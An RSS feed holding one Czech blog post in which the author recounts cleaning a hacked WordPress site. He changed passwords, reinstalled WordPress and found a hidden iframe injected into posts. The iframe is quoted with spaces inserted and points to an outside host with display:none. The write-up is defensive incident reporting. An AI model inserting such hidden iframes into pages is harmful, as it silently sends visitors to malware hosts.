<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Re4DeR &#187; bezpečí</title>
	<atom:link href="http://re4der.info/tag/bezpeci/feed/" rel="self" type="application/rss+xml" />
	<link>http://re4der.info</link>
	<description>Zde naleznete můj blog</description>
	<lastBuildDate>Mon, 02 Aug 2010 12:12:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Hacklý wordpress (iframe)</title>
		<link>http://re4der.info/inernet/hackly-wordpress-iframe/</link>
		<comments>http://re4der.info/inernet/hackly-wordpress-iframe/#comments</comments>
		<pubDate>Mon, 07 Sep 2009 00:12:33 +0000</pubDate>
		<dc:creator>Re4DeR</dc:creator>
				<category><![CDATA[Inernet]]></category>
		<category><![CDATA[bezpečí]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.re4der.info/?p=116</guid>
		<description><![CDATA[Psal mi týpek z xacrew.cz, že je na webu vir. Koukám na to a iframe. Týpek používá (používal) total comander tak je to jasný. Začnu to opravovat. Nejdřív změny hesel. Manuální aktualizace wordpressu (přehrány všechny soubory) na nejnovější verzi. Zhlédnutí kódů šablony a odstranění javascriptu &#8211; tady jsem čekal, že to pomůže. Jenže ono ne. [...]]]></description>
			<content:encoded><![CDATA[<p>Psal mi týpek z <a href="http://www.xacrew.cz">xacrew.cz</a>, že je na webu vir.</p>
<p>Koukám na to a iframe. Týpek používá (používal) total comander tak je to jasný. Začnu to opravovat.</p>
<ol>
<li>Nejdřív změny hesel.</li>
<li>Manuální aktualizace wordpressu (přehrány všechny soubory)  na nejnovější verzi.</li>
<li>Zhlédnutí kódů šablony a odstranění javascriptu &#8211; tady jsem čekal, že to pomůže. Jenže ono ne.</li>
</ol>
<p>Nějak jsem na nic nemohl přijít tak nakonec vypnu Noda a koukám na vygenerovaný kód. Tam je na konci příspěvku tento kód (bez mezer):</p>
<blockquote><p>&lt; i f r a m e  s r c = h t t p : / / g c o u n t e r . c n   s t y l e = d i s p l a y : n o n e &gt; &lt; / i f r a m e &gt;</p></blockquote>
<p>V šabloně nebyl. Kouknul jsem do administrace wordpressu a zde v &#8216;html modu&#8217; je vložený.</p>
<p>Tak jsem ho smazal, ale nepochopil jsem kde se tam vzal. Rovnou do databáze nemohl, musel přes administrační rozhraní. Na netu jsem taky nic moc nenašel. Ještě se na to zítra kouknu.</p>
<p>Web by měl být v pořádku, požádal jsem google o přezkoumání bezpečnosti.</p>
<p><strong>EDIT 8.9:</strong></p>
<p><a href="http://www.stopbadware.org">Stopbadware.org</a> řekl, že web je ok-spolupracují s googlem. Docela rychlost. Čekal jsem, že to bude trvat dýl.</p>
]]></content:encoded>
			<wfw:commentRss>http://re4der.info/inernet/hackly-wordpress-iframe/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
